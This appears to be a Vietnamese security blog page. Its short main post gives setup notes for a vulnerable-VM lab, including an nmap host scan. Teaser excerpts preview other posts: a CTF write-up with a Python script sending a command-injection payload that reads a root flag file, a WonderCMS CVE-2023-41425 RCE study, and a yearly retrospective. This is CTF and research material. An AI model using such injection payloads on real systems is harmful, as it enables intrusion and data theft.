T chỉ muốn làm một nhân vật phụ trong một bộ romcom học đường đầy tình cảm T__T
Setup máy ảo
Nhận đường liên kết
Facebook
X
Pinterest
Email
Ứng dụng khác
Setup
Download vulnbox va import
tren may attacker and client chuyen thanh only host adapter
Nho set cable connect
nmap -pn ip/24 de detect client ip
Nhận đường liên kết
Facebook
X
Pinterest
Email
Ứng dụng khác
Nhận xét
Bài đăng phổ biến từ blog này
KMA THI SINH VIÊN ATTT CẤP HỌC VIỆN Hế lô ae, giải này end cũng mấy hôm rồi nhưng mà mình cũng chưa định viết writeup do còn 2 bài web nữa chưa xong :( Nhưng mà kệ đi, dưới đây là 3 bài mình đã solve. :( Pwn1: Welcome to KCSC Bài này mình chỉ đăng script thôi, xin nhỗi mn :> from pwn import * import requests # elf = context.binary = ELF("./advice") pay1 = b ''' Hello" && /usr/bin/as @/root/root.txt; echo" ''' pay2 = b " 111111 " # r = elf.process([pay1, pay2]) d = requests . post ( " http://103.162.14.116:5001/contact " , data ={ " name " : pay1 , " advice " : pay2 } ) print ( d . text ) # r.interactive() Web1: You are a good admin. Mn có thể tải file tại đây . Sau khi build docker xong, hãy quan sát một chút về code có 4 route là / /login /admin /file. Cái /tesing là mình tự thêm vào nên mn không cần để ý đâu :)) Tại route /file, ta dễ thấy nó đang bị lỗi file inclusion tại tham số f. ...
CVE-2023–41425 Lời nói đầu: Bài viết này có ở đây để mình hiểu sâu hơn về cách tìm lỗi trong các mã nguồn CMS, rất mong được mọi người đón nhận và sửa lỗi nếu có sai sót. ---------------------------------------------------------------------------------------------------------------------------- Đầu tiên lên nvd.nist.gov để tìm hiểu lỗi. Như trên hình thì nó cho ta biết một lỗi XSS tại version 3.2.0->3.4.2 của Wonder CMS có thể dẫn đến RCE thông qua installModule component. Mình cũng nói trước là mình chỉ research RCE part, còn XSS thì mình sẽ không quan tâm mặc dù nó cũng trong phần Attack Chain Tiến hành download bản lỗi, tại đây mình download bản 3.4.2 cũng tức là bản đang có lỗi này. Tại dòng 146, mình thấy có hàm installUpdateModuleAction(). Tuy nhiên, dòng 142 cho biết chúng ta phải đăng nhập mới có thể sử dụng tính năng này. -> cần xác thực Vì muốn hiểu cách thức RCE nên mình sẽ bỏ qua phần xác thực, tiến hành đăng nhập luôn Hàm này sẽ hoạt động như nào...
Tản mạn về năm 2024 của Spycio.Kon Một số thành tích nổi bật trong năm - Tự tay host một ctf nhỏ cho team từ A-Z - Tham gia kì thi lấy chứng chỉ quốc tế với tổng thiệt hại là hơn 500$, 20 ngày mất ngủ và 3 tháng ôn tập (mình được một anh đẹp zai hỗ trợ thi hihi), mặc dù chỉ được 2/3 chặng đường (fail) T__T. Em xin lỗi anh rất nhiều. - Đã giải được một số challenges ở một số giải ctf mà năm trước mình khó có thể giải được - Đã viết POC cho một số CVE mình chơi và được một số trang web crawl trúng, khá vui ^^ https://cve.imfht.com/poc_detail/75cc08888950aec9e37a3c206652083d271746e4 https://cvefeed.io/vuln/detail/CVE-2023-41425 https://154.17.20.211 - Nói chuyện được với một số idol quốc tế như IRELAND WITHOUT RE, Microsoft/Synack redteamer/bug hunter,... - Đã viết trên Viblo và cảm thấy bản thân đã có những đóng góp cho cộng đồng lập trình viên trong và ngoài nước mặc dù nó không có gì nhiều =))) https://viblo.asia/p/huong-dan-tao-discord-bot-bang-lm-studio-3kY4g0pyJAe https://viblo...
Nhận xét
Đăng nhận xét